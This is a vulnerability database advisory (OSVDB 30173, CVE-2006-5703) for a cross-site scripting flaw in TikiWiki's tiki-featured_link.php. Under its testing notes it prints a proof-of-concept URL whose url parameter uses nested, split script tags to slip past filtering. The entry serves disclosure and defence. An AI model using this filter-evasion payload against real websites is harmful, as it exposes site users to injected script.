TikiWiki tiki-featured_link.php url Variable Nested Tag XSS

2006-11-01T08:03:50
ID OSVDB:30173
Type osvdb
Reporter OSVDB
Modified 2006-11-01T08:03:50

Description

Manual Testing Notes

/tiki-featured_link.php?type=f&url=" ></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--

References:

Vendor URL: http://tikiwiki.org/
Secunia Advisory ID: 23039
Secunia Advisory ID: 22678
Related OSVDB ID: 30172
Other Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200611-11.xml
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0014.html
FrSIRT Advisory: ADV-2006-4316
CVE-2006-5703
Bugtraq ID: 20858